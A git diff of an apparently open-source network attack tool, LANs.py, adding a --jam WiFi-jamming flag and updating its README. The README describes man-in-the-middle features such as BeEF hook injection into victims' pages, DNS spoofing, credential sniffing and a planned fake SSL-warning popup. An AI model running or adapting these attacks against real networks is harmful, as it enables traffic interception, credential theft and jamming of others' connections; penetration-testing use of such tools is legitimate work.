diff --git a/LANs.py b/LANs.py index fe39ae9..f35ee5a 100755 --- a/LANs.py +++ b/LANs.py @@ -13,13 +13,13 @@ Prerequisites: Linux Note: This script flushes iptables before and after usage. -To do: 1. Rogue DHCP server - 2. Refactor with lots of smaller functions - 3. Mass wifi jammer - 4. Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?) - 5. Add karma MITM technique - 6. Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through - 7. Integrate with wifite +To do: + *** Finish https://github.com/DanMcInerney/net-creds and plug it in as the LANs.py main cred engine + Refactor with lots of smaller functions + Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?) + Add karma MITM technique + Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through + Integrate with wifite would be cool ''' @@ -133,6 +133,8 @@ def parse_args(): action='store_true') parser.add_argument("--accesspoint", help="Enter the MAC address of a specific access point to target") + parser.add_argument("--jam", + help="Jam all wifi in range", action="store_true") return parser.parse_args() #Console colors @@ -154,6 +156,7 @@ interface = '' def LANsMain(args): global victimIP, interface + #Find the gateway and interface ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN) ipr = ipr.communicate()[0] @@ -1248,7 +1251,6 @@ def wifijammerMain(args): print '\n[' + R + '!' + W + '] Closing' sys.exit(0) - def get_mon_iface(args): global monitor_on monitors, interfaces = iwconfig() @@ -1594,16 +1596,8 @@ if __name__ == "__main__": if args.pcap: pcap_handler(args) exit('[-] Finished parsing pcap file') - if args.skip is not None or args.channel is not None or args.maximum is not None or args.noupdate is not False or args.timeinterval is not None or args.packets is not None or args.directedonly is not False or args.accesspoint is not None: - ###If wifijammer arguments are given - if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None: - ###If LANs.py arguments are given - ###Both LANs.py arguments and wifijammer arguments are given. This will not work since wifijammer jams the network that LANs.py is trying to monitor - exit('Error. Cannot jam WiFi and monitor WiFi simultaneously') - if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None: - ###If LANs.py arguments are given, then run as LANs.py - LANsMain(args) - else: - ###If no LANs.py arguments are given, then run as wifijammer (expected behavior of jamming wifi when no arguments given is continued) + if args.jam: wifijammerMain(args) + else: + LANsMain(args) diff --git a/README.md b/README.md index 6bf7c4d..535ef72 100644 --- a/README.md +++ b/README.md @@ -90,48 +90,41 @@ Example 2: This will spoof the domain eff.org and subdomains of eff.org. When th python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c 'Owned.' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10 ``` + #### Jam all WiFi networks: ``` shell -python LANs.py +python LANs.py --jam ``` + +#### Jam just one access point (router) +``` shell +python Lans.py --jam --accesspoint 01:MA:C0:AD:DY + + ### All options: ----- Normal Usage: * -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js - * -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject - * -d: open an xterm with driftnet to see all images they view - * -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com - * -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this - * -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN - * -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting - * -i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0 - * -ip: target this IP address - * -n: performs a quick nmap scan of the target - * -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt - * -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received - * -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument - * -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it - * -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it - * -v: show verbose URLs which do not truncate at 150 characters like -u + * --jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary Wifi Jamming: